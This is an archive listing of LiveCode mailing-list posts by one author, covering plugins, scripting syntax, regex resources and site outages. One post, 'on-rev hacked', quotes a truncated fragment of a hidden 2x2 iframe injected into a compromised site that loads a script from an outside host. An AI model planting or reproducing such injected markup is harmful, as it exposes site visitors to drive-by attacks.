Re: Release: LiveCode 8.0.0 DP 1

2015-03-12 Thread Mark Laffoon
All of the "old" plugins (chart maker, scrapbook, etc.) are no longer available on the Livecode store... Is this feature discontinued? On Thu, Mar 12, 2015 at 12:25 PM, Colin Holgate wrote: > i emailed Ben a screenshot of how the tool palette looks. It only has the > two run mode arrows. No widg

Re: [OT] For Mark Laffoon: Scripter's Scrapbook

2014-05-08 Thread Mark Laffoon
Hugh, Thanks for trying to find me through another method! What I was attempting (poorly perhaps) to refer to was including a link to a pre-existing ssbk entry when using the API to set a new entries data. Example: *ssBkSetEntryData* "MyEntry","Pinky Swears","Link to:" && *ssBkGetEntryLink*"13

Re: Sending an email on Windows 8

2013-01-08 Thread Mark Laffoon
Your syntax was just missing a question mark prior to the ampersand: put "mailto:myem...@gmail.com?&subject="; & tSubject into tMessage revGoURL tMessage On Tue, Jan 8, 2013 at 12:30 PM, Mark Wieder wrote: > Mark Stuart writes: > > > > > Wow! > > I guess no one is using Windows 8. > > My dev

Offline lessons.runrev.com

2013-01-06 Thread Mark Laffoon
Recently, I had the opportunity to grab some 3rd party tools in the RunRev store, one of which was "The Scripter's Scrapbook" (SSBK). Wow, that is one neat tool. So as I'm going about filling it up with all the goodies I had laying around in text files &

Re: [Livecode Fr] au secours!

2013-01-01 Thread Mark Laffoon
Maybe this? http://stackoverflow.com/questions/7221087/applescript-to-get-the-url-from-safari On Monday, December 31, 2012, Ludovic Thébault wrote: > > Le 1 janv. 2013 à 01:12, "Marc H. Bossiere" > > > a écrit : > > > Je ne peux pas commencer 2013 sans une solution! Ma tête va exploser! > > J'a

Re: Help with Regex (was Re: Switch, Case and wild-cards?)

2012-12-29 Thread Mark Laffoon
I've always found RegExhibit from http://roger-jolly.nl/software/#regexhibithelpful. Also, for reference material, http://www.regular-expressions.info/ has been of great help. Just my 2 cents. Mark -- I am CDO. This is a lot like OCD, except the letters are in alphabetical order... as they sho

Re: RunRevPlanet Site down

2012-12-20 Thread Mark Laffoon
Great! In fact, those tips are what I was after. I should probably just get the ebook and stop leaching your bandwidth. Mark On Thursday, December 20, 2012, Richard Gaskin wrote: > Scott McDonald wrote: > >> Working Now. >> > > Thanks, Scott. > > If you folks haven't seen it, Scott's "LiveCode

RunRevPlanet Site down

2012-12-19 Thread Mark Laffoon
Just an FYI in case the owner/maintainer of RunRevPlanet uses the list, the site is offline with a message that it cannot connect to the database. Mark ___ use-livecode mailing list use-livecode@lists.runrev.com Please visit this url to subscribe, unsubs

Re: [ANN] Free "Kochi Mini SVN" a very simple "Version Control System” for LiveCode

2012-12-16 Thread Mark Laffoon
I know this post is a latecomer to the topic, but having just experienced the same problem as Skip, I thought it relevant. I managed to install the plugin by starting up LiveCode with the (Windows) "Run as Administrator" option. HTH Mark On Tue, Nov 6, 2012 at 6:22 AM, Andrew Kluthe wrote: >

Re: on-rev hacked

2012-06-08 Thread Mark Laffoon
Looks like they got you again http://elflorado.de/i/c.php"; name="Twitter" scrolling="auto" > frameborder="no" align="center" height="2" width="2">'); On Tue, Jun 5, 2012 at 11:15 PM, Tiemo Hollmann TB wrote: > That didn't became clear for me too. Is the 5G blacklist code on the > website >

Re: How to put icon to the right of the menu bar?

2012-05-31 Thread Mark Laffoon
>From a prior thread in the archive: Sorry to be late to the party on this, but currently the status icon support > in LC is for Windows only (at least according to the Read Me). > > I have a step-by-step tutorial on setting one up using Xcode, that includes > calling AppleScript from any status m